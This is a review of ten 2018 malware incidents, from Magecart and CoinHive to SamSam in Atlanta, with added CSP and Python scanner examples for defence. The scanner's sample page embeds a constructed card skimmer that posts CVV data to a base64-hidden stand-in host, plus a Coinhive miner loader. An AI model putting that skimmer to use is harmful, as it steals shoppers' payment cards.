Top 10 Malware Incidents and Campaigns of 2018
Ransomware and cryptominers of steadily growing sophistication remained among the most expensive cybersecurity problems of 2018.
Despite more than 50 anti-malware vendors, and advances in AI-assisted detection that promise to catch both known and unknown malware, malware remains a significant threat to the almost 2 billion websites around the world.
In March 2018, SiteLock reported that around 18.5 million websites are infected with some form of malware at any given time, and that the average website is attacked 44 times a day. Here we list ten of the more high-profile successful malware infections and campaigns of 2018.
10: Voter details stolen and encrypted in ransomware attack on California newspaper
When: January 2018
Who was affected: The Sacramento Bee newspaper; 19.5 million voters, 53,000 subscribers.
Type of malware: Ransomware.
In January, a standalone ransomware attack hit The Sacramento Bee, a California newspaper. An attacker gained access to two databases hosted on a third-party server, encrypted them and demanded an undisclosed amount of Bitcoin.
The databases held the voter records of 19.5 million Californians, as well as personal contact details of a further 53,000 Bee subscribers. Although the intrusion and data exposure succeeded, the extortion attempt failed: rather than pay, the Bee deleted the databases to prevent any further exposure.
The Bee's own explanation was that the server's firewall had not been brought back online after routine maintenance, leaving the databases reachable from the internet.
9: Destructive wiper Shamoon resurfaces in Middle East
When: November-December 2018
Who was affected: Saipem, an Italian oil and gas services contractor, and undisclosed others.
Type of malware: Disk wiper.
Shamoon, also known as Disttrack, first appeared in 2012, primarily targeting organizations in the Middle East. In the first major attack in 2012, 30,000 endpoints belonging to oil firm Saudi Aramco had their hard drives wiped.
Some analysts have suggested that Shamoon was Iranian retaliation for the Stuxnet attack on Iran's nuclear program, itself generally attributed to the U.S. and Israel, and that it was aimed at U.S. allies in the Gulf. That attribution has never been officially confirmed.
The malware enumerates files on an infected machine, reports back to the attacker, then overwrites some or all of the machine's files and its master boot record, leaving the machine unable to boot.
Shamoon incidents had largely subsided over the preceding two years, until a reported resurgence in Saudi Arabia in November. The organizations affected were not disclosed, but further cases continued to surface. In December, Saipem reported that a Shamoon variant had hit around 300 of its servers, disrupting some of its operations.
More recently, a new Shamoon sample was uploaded to VirusTotal from the Netherlands, though no victims of this variant have been reported so far.
8: Australian recruitment firm PageUp affected by unnamed malware
When: May 2018
Who was affected: BP and possibly multiple other PageUp clients.
Type of malware: Undisclosed.
Melbourne-based PageUp People provides cloud HR and recruitment services to clients around the world, including BP, Telstra, Lindt and Zurich. In May, suspicious activity was detected in PageUp's systems. This was later determined to be a malware infection and the cause of a potential personal data breach. PageUp disclosed nothing about the malware beyond saying it had been purged from their systems and was now detectable by their antivirus.
Several PageUp clients took their recruitment pages offline. In November 2018 the firm provided further information on the breach, stating that there was no evidence the attackers had exfiltrated personal data on any of its 2.6 million active users. In other words, the attackers had breached the system and installed data exfiltration tools, but PageUp found no evidence that anything had actually been taken.
7: 2,000 WordPress sites infected with keylogger and cryptominer
When: January 2018
Who was affected: 2,000 WordPress sites.
Type of malware: keylogging and cryptojacking scripts.
January brought a follow-up to the December 2017 keylogging campaign that had infected 5,400 WordPress sites. A further 2,000 sites were infected with an updated version of the malicious script. Visitors' keystrokes on an infected site, including WordPress login credentials, were recorded and sent to a third-party server.
The compromised sites were typically running outdated, vulnerable versions of WordPress core, or outdated and exploitable themes or plugins.
The keylogger was bundled with a cryptojacking script that made visitors' browsers mine cryptocurrency on the attacker's behalf. That script is part of a much wider cryptojacking epidemic in 2018, which we revisit later in this list.
6: Cryptomining trojan spread through a MediaGet torrent client update, blocked by Windows Defender
When: March 2018
Who was affected: 400,000 users’ PCs targeted.
Type of malware: A variant of the Dofoil/Smoke Loader malware.
In early March, Microsoft reported that Windows Defender had blocked a large wave of trojan infections. The trojan's purpose was to drop a remotely controlled cryptominer on victims' PCs, channelling the mined cryptocurrency back to the attacker. The campaign hit users worldwide, but the majority of affected machines were in Russia, Turkey and Ukraine.
Detections grew from an initial 80,000 to over 400,000 within days. Microsoft later traced the infection vector to the MediaGet torrent client: its update mechanism had delivered a trojanized copy of the client, signed with a certificate that was not MediaGet's own, so the malware arrived through a channel users had every reason to trust. Rapid detection and signature updates appear to have contained the campaign before it could spread much further.
5: Widespread ransomware attacks on medical institutions
When: Throughout 2018
Who was affected: Hundreds of thousands of patients at various medical organizations.
Type of malware: Ransomware.
Medical institutions have become an increasingly popular target for ransomware. The highly sensitive data they process, and their dependence on continuous system availability, make them attractive extortion targets. From 2016 to 2017, ransomware attacks against healthcare organizations increased by 89%.
The trend continued into 2018, with several damaging attacks on a range of targets throughout the year. The California Center for Orthopedic Specialists, Blue Springs Family Care in Missouri and the Fetal Diagnostic Institute of the Pacific are just a few of the victims. Some affected organizations paid the ransom; others attempted to recover without paying. Either way, these attacks disrupt patient care and expose the highly sensitive data of vulnerable people.
4: Magento e-commerce platform users infected with payment detail skimmer
When: March-August 2018
Who was affected: Over 7,000 online shops.
Type of malware: Keylogger/Payment information skimmer.
Magento is an open-source e-commerce platform, and one of the most widely deployed third-party e-commerce platforms on the internet. Magento-powered stores process large volumes of customer personal and payment data. In August 2018, security researcher and Byte.nl co-founder Willem de Groot uncovered a widespread skimming campaign that had compromised more than 7,000 Magento stores. The injected script worked like a keylogger on the checkout page, capturing card details and other data as customers typed them and forwarding them to a server under the attackers' control.
3: Multiple Magecart payment detail attacks throughout 2018
When: Throughout 2018
Who was affected: Thousands of websites; most prominently British Airways and Ticketmaster
Type of malware: Credit card skimmer.
The term ‘Magecart’ refers to both the malware itself and the various groups of threat actors employing it. Flashpoint and RiskIQ have identified at least seven groups, each with a different method of operation.
Magecart skimmers infected numerous websites over 2018. In September, the customer-engagement (web push notification) service Feedify reported that a Magecart skimmer had been inserted into the JavaScript library it serves to customers' sites, exposing roughly 4,000 websites through a single third-party script.
Magecart is most often cited as the cause of the Ticketmaster and British Airways breaches, the latter of which appears in our list of the top 10 app-sec breaches of 2018. Those two breaches alone may have compromised over half a million payment cards.
The Magecart groups have had such success with their skimmers that they have begun competing with one another. In November, security researchers reported that one group's skimmer contained code to sabotage rival groups' skimmers running on the same page.
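A skimmer running inside the checkout page still has to get the card data off that page, which is where a browser-side control applies. Content Security Policy lets the site pin where scripts may be loaded from and where the page may send data, so an injected loader fails to load and an injected skimmer's outbound request is blocked by the browser. The fragment below is an added example for an nginx front end; it is not configuration from the article or from any site named in it, and the hostnames cdn.shop.example and api.payments.example are placeholders. The weak header is included for contrast only; a real deployment ships one policy, not both.

```nginx
# Weak (for contrast only): any origin may supply scripts, and the page may send
# data anywhere. An injected skimmer loads and exfiltrates without the browser objecting.
add_header Content-Security-Policy "default-src *; script-src * 'unsafe-inline' 'unsafe-eval'; connect-src *" always;

# Hardened (placeholder hostnames): scripts only from the site and one vetted CDN;
# XHR/fetch/beacon traffic and form posts only to the site and its payment processor;
# images only from the site, since skimmers also exfiltrate via new Image().src;
# plugins disabled; violations reported to an endpoint the security team watches.
add_header Content-Security-Policy "default-src 'self'; script-src 'self' https://cdn.shop.example; connect-src 'self' https://api.payments.example; form-action 'self' https://api.payments.example; img-src 'self' data:; object-src 'none'; report-uri /csp-report" always;
```

Two caveats a practitioner would add. First, an allowlisted vendor host is inside the policy, so CSP alone does not help when the vendor's own library is altered upstream, as Feedify's was; pair it with Subresource Integrity (an integrity attribute carrying the script's hash on each third-party script tag) so that a modified library fails to load instead of executing. Second, roll the policy out under Content-Security-Policy-Report-Only first and review the reports before enforcing, because a checkout page that stops loading its payment widget is its own kind of outage.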
2: The 2018 CoinHive cryptojacking epidemic
When: Throughout 2018
Who was affected: Many victims across the whole internet.
Type of malware: Cryptojacking.
CoinHive was 2018's most prolific cryptojacking script. It is an unusual case, because CoinHive was not originally conceived as malware. Though its legitimacy was always questionable, CoinHive presented itself as a way to monetize web pages by having visitors' CPUs mine Monero for the site owner. In practice it was overwhelmingly deployed by attackers who injected it into sites they had compromised, without the visitors' or site owners' consent. By the end of the year it had been named the top malicious threat to web users, and anti-virus products and ad blockers flag its script as malware.
Small to moderate malicious CoinHive infections were nearly monthly news throughout 2018. In February, thousands of websites, including various UK government services and the website of the data protection regulator itself, were infected with CoinHive through a single compromised third-party accessibility script that all of those sites loaded. As of August, CoinHive was estimated to be generating over $250,000 per month, and it is likely that most of this went to cryptojackers injecting it into other people's websites.
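Items 7, 3 and 2 all come down to the same thing: a script the site owner never wrote, either a miner loader or a card skimmer, inserted into a page. The scanner below is an added example, not code from the original article or from any vendor or researcher named in it. It parses a page's HTML, flags external scripts served from hosts not on an allowlist, matches the Coinhive loader and its miner constructor by name, and flags inline scripts that both read payment-card fields and contain a way to send data off the page (with obfuscation such as atob or eval noted separately). The allowlisted hosts, the regex heuristics and the sample page, including the base64-hidden collection URL, are all constructed for the example; real skimmers are more heavily obfuscated than this, so treat the heuristics as a first pass for triage, not as a signature.

```python
"""Static scan of an HTML page for injected cryptominer loaders and card skimmers."""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Hosts whose scripts are expected on this page. Assumption for the example; a real
# deployment would take this from an inventory of first-party and vetted vendor origins.
ALLOWED_SCRIPT_HOSTS = {"shop.example", "cdn.shop.example"}

# Coinhive's public loader script and the miner constructors its API exposes.
MINER_PATTERNS = [
    re.compile(r"coinhive\.min\.js", re.I),
    re.compile(r"CoinHive\.(Anonymous|User)\s*\("),
]

# A skimmer has to read payment fields AND get them off the page. Either half alone
# is common in benign code, so a finding requires one match from each group.
CARD_FIELD_PATTERN = re.compile(r"(card[_-]?number|cvv|cvc|expir|cc[_-]?num)", re.I)
EXFIL_PATTERN = re.compile(r"(XMLHttpRequest|fetch\s*\(|sendBeacon|new\s+Image\s*\()")
OBFUSCATION_PATTERN = re.compile(r"(\batob\s*\(|fromCharCode|\beval\s*\()")


class ScriptCollector(HTMLParser):
    """Collects external script sources and inline script bodies from an HTML document."""

    def __init__(self):
        super().__init__()
        self.external = []      # values of src= on <script> tags
        self.inline = []        # bodies of <script> elements without src
        self._in_inline = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_inline = True
            self._buf = []

    def handle_data(self, data):
        if self._in_inline:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_inline:
            self.inline.append("".join(self._buf))
            self._in_inline = False


def scan_html(html, allowed_hosts=None):
    """Return a list of (kind, detail) findings for the page, in document order."""
    allowed = ALLOWED_SCRIPT_HOSTS if allowed_hosts is None else allowed_hosts
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for src in parser.external:
        host = urlsplit(src).hostname
        if host is None:
            continue                      # relative path, served by the site itself
        if host not in allowed:
            findings.append(("unlisted_script_host", host))
        if any(p.search(src) for p in MINER_PATTERNS):
            findings.append(("cryptominer_loader", src))
    for body in parser.inline:
        if any(p.search(body) for p in MINER_PATTERNS):
            findings.append(("cryptominer_call", body.strip()[:60]))
        reads_card = CARD_FIELD_PATTERN.search(body)
        exfil = EXFIL_PATTERN.search(body)
        if reads_card and exfil:
            kind = "skimmer_obfuscated" if OBFUSCATION_PATTERN.search(body) else "skimmer"
            findings.append((kind, f"reads {reads_card.group(0)!r}, sends via {exfil.group(0)!r}"))
    return findings


# Constructed sample page: one legitimate CDN script, one relative script, a Coinhive
# loader plus miner call, a skimmer that hides its collection URL in base64, and a
# harmless inline script that must not be flagged.
SAMPLE_PAGE = """<html><head>
<script src="https://cdn.shop.example/js/checkout.js"></script>
<script src="/js/app.js"></script>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>var m = new CoinHive.Anonymous('SITE_KEY', {throttle: 0.3}); m.start();</script>
<script>
  document.forms[0].addEventListener('submit', function () {
    var d = document.getElementById('card_number').value + '|' +
            document.getElementById('cvv').value;
    var x = new XMLHttpRequest();
    x.open('POST', atob('aHR0cHM6Ly9jb2xsZWN0LmludmFsaWQv'));  // base64 of https://collect.invalid/ (constructed)
    x.send(d);
  });
</script>
<script>console.log('analytics init');</script>
</head><body></body></html>"""

if __name__ == "__main__":
    for kind, detail in scan_html(SAMPLE_PAGE):
        print(f"{kind:22s} {detail}")
```

Run against the sample page this reports the unlisted coinhive.com host, the miner loader, the miner constructor call and an obfuscated skimmer, and nothing for the CDN, relative or analytics scripts. Run it over a crawl of your own checkout pages rather than a single snapshot: the WordPress and Magento campaigns above reinfected cleaned sites, so a one-off clean result proves little.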
1: SamSam ransomware and the City of Atlanta
When: March 2018
Who was affected: Multiple organizations across the U.S.; the most damage was done to the City of Atlanta.
Type of malware: SamSam Ransomware
The ransomware attack on the City of Atlanta involved no large-scale data breach. It was, however, the year's most costly ransomware attack, and a vivid demonstration of how ransomware can cripple an organization, even when that organization is an entire city government.
SamSam is a targeted ransomware deployed by hand against chosen victims, and one of 2018's most damaging ransomware families. Its success comes largely from that targeting. The SamSam operators break into a victim, typically by brute-forcing internet-exposed Remote Desktop Protocol logins or exploiting unpatched servers, reconnoiter the network, take care to hide their presence, and then encrypt as much as possible at once, including, where they can reach them, the backups.
As of late November, the FBI estimated that SamSam had caused $30 million worth of damage to its targets across the US.
The City of Atlanta is the most high-profile victim. The ransomware shut down both critical and non-critical city government systems, bringing parts of the administration to a standstill. The ransom demand was approximately $51,000 in Bitcoin (6 BTC), but it was not paid. Instead, the city set about rebuilding its systems itself. According to a document obtained by the Atlanta Journal-Constitution, as of August 2018 the recovery was projected to cost $17 million.
In November 2018, the U.S. Department of Justice charged two Iranian nationals with developing and operating SamSam. With no extradition treaty between the U.S. and Iran, it is unlikely that the two will ever be arrested unless they leave their native country. The SamSam playbook of targeted, hands-on-keyboard intrusion followed by network-wide encryption has been so successful, however, that other crews and other ransomware families, notably BitPaymer and Ryuk, are now copying it.